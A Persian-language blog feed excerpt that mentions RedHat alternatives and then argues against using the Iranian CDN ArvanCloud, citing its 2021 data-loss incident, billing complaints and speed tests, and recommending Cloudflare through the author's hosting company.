مطالعه کنید. https://developers.redhat.com/articles/faqs-no-cost-red-hat-enterprise-linux#contacting_red_hat_for_assistance جایگزین های RedHat رایگان و پولیاین سیستم عامل در میان شرکت های ارائه دهنده هاست اشتراکی بسیار محبوب است . بر پایه centos است و از کرنل OpenVZ استفاده میکند. رایگان نیست ولی نسبت به قابلیت هایی که داره ارزش هزینه کردن داره.قیمت هاش هم متفاوت کمترین قیمتش در زمان نوشتن این مقاله به این صورت: هزینه نصب اولیه 180 تومن با پرداخت ماهیانه 53 تومن .المالینوکس یکی از distribution های رایگان و اوپن سورس لینوکس که توسط CloudLinux ساخته شده برای این اتفاقات اخیر که در دنیا Redhat افتاده اولین نسخه stable اش هم 10 فروردین 1400 منتشر شده.اگر این مقاله برای شما مفید بوده حتما لایک کنید و نظرتون رو بنویسید . برای دیدن مقاله های بیشتر هم من در ویرگول دنبال کنید. معین امیدی معین امیدی Mon, 05 Jul 2021 17:24:27 +0430 https://virgool.io/@moeinomidii/why-using-arvancloud-is-dangerous-h9sfiqlp0xhf چند هفته پیش پستی را در اینستاگرام کرالاهاست منتشر کردیم [1] و به صورت مختصر توضیح دادیم چرا نباید از CDN های ایرانی مانند ابرآروان و ابر دراک استفاده کنید. اگر بخواهیم از دید مالی رد شویم مسائل بسیار مهم دیگری هستند که در این مقاله قصد بررسی آن ها را داریم.به گزارش بی بی سی فارسی [2] در روز 26 اسفند سال 1399 حملات سایبری به ابرآروان صورت گرفت و باعث پاک شدن بخش زیادی از اطلاعات مشتریان سرویس زیرساخت ابری اروان شد و به گفته خود ابرآروان امکان بازگردانی 16 درصد از مشتریان مقدور نبود! [3] به بیان دیگر دیتا آن ها پاک شده و هیچ نسخه بک آپ از آن ها موجود نیست.خسارت بسیار بزرگی به کسب و کار هایی که از زیرساخت ابری آروان استفاده میکردند وارد شد . اما بازپرداخت پول سرویس ابری کمکی به کاربران نمیکند ! به‌گفته پورحسینلو،" ابرآروان دَه برابر وظیفه قانونی‌اش جبران خدمات کرده است؛ اما این جبران تنها مربوط به حوزه زیرساختی می‌شود."طبق استانداردهای جهانی، ما پشتیبانی و جبران خسارت را انجام دادیم؛ اما همان‌طور‌که به‌عنوان فراهم‌کننده زیرساخت در سود کسب‌وکار شریک نیستیم، در خسارت آن‌ها هم نمی‌توانیم شریک باشیم.[4]ایلیا وکیلی نیز توضیح داد که به کسب‌وکارها از قبل تأکید شده است که اگر داده مهمی دارند، قطعا باید از آن نسخه پشتیبان تهیه کنند و به یک دیتاسنتر کفایت نکنند؛ اما چنین توصیه‌هایی جدی گرفته نشده است. وی اضافه کرد:در سطح دنیا هم، هیچ دیتاسنتری تضمین نمی‌دهد از دیتای مهم کسب‌وکارها نگه‌داری می‌کند.در بالا بخشی از دفاعیه های ابرآروان و سلب مسئولیت آن ها از اتفاقات افتاده را بدون هیچ گونه ویرایش برای شما قرار دادیم.چرا کسب و کار های زیادی به ابرآروان مهاجرت کردند؟بعد از اعتراضات آبان 1398 در ایران و قطع شدن اینترنت بین الملل [5] تنها سرویس که دسترسی به اینترنت بین الملل را داشت ابرآروان بود صاحبان کسب و کار برای نجات کسب و کار خود و فرار از ترس صحبت هایی که درباره ملی شدن اینترنت در میان بود به ابراروان مهاجرت کردند.بازگشت سریع کاربران به سرویس های قبلیشانطولی نکشید که کابران با فاکتور های عجیب و غریبی مواجه شداند که در بعضی موارد 10 برابر بیشتر از پول سرور ORIGIN کاربر بود. پشتیبانی ضعیف ، محاسبه پهنای باند استفاده شده (در حالی که در کلادفلیر همچین چیزی وجود نداره) ،ایراد در راه اندازی اولیه سرویس ها و قطعی های زیرساخت اینترنت ایران باعث شد بعد از وصل شدن اینترنت در ایران کاربران دوباره به سرویس قبلی خود برگردند.نمونه کوچکی از فاکتور های ابرآروانتفاوت سرعت لود در ابرآروان و کلادفلیریکی از فریب هایی که در CDN های ایرانی وجود داره افزایش سرعت لود کاهش TTFB و First Content Paint هستش . برای تست از جی تی متریکس استفاده میکنیم (این تست خودتون مجددا تکرار کنید تا مطمعن بشید)سرعت لود سایت فوتبالی (روی آروان)سرعت لود سایت کتاب راه (روی آروان)سرعت لود کرالاهاست روی پلن cloudflare PROنظرات کابران در توئیتر و شبکه های اجتماعیhttps://twitter.com/arvancloud_fa/status/1325734846136725504https://twitter.com/Mojtaba_behnam/status/1267753858169745411https://.twitter.com/Moeinafshari/status/1390337907702091782 ونه نقض حریم شخصی در ابرآروان https://twitter.com/Hamed/status/1365020785056878592مقاله ای بسیار مفید و خلاصه درباره تجریبات استفاده از ابرآروان .بهتر است کامنت ها را هم بخوانید. https://virgool.io/@amin.rezaei/%D8%AA%D8%AC%D8%B1%D8%A8%D9%87-%D9%85%D9%86-%D8%A7%D8%B2-%D8%A7%D8%A8%D8%B1-%D8%A2%D8%B1%D9%88%D8%A7%D9%86-tblhkygaymnu گزارش بی بی سی فارسی https://www.bbc.com/persian/business-56467824 صبحت های مدیر سایت بیاموز http://ali.shahdoost.info/2020/06/513/ بهتر است از چه سرویس استفاده کنیم؟با توجه به رفع مشکل کلادفلیر برای دامنه های ای ار اکثر سایت های ایرانی مثل گذشته رو به کلادفلیر آوردند. حتی شرکت ایران سرور که اخیرا دوباره به کلادفلیر بازگشت. پیشنهاد ما هم استفاده از کلادفلیر حتی اگر از پلن رایگان آن هم استفاده کنید .بهتر از استفاده از CDN های ایرانی است.استفاده ایران سرور از کلادفلیردر صورتی که تمایل دارید کلافلیر پرو بخرید. کرالاهاست بعد از مدت ها مذاکره توانسته یکی از partnership های کلادفلیر شود و با کارمزد بسیار کم سرویس های PRO و Business را برای شما خریداری کرده.اگر این مقاله برای شما مفید بوده حتما لایک کنید و نظرتون رو بنویسید . برای دیدن مقاله های بیشتر هم من در ویرگول دنبال کنید. معین امیدی معین امیدی Tue, 22 Jun 2021 15:43:16 +0430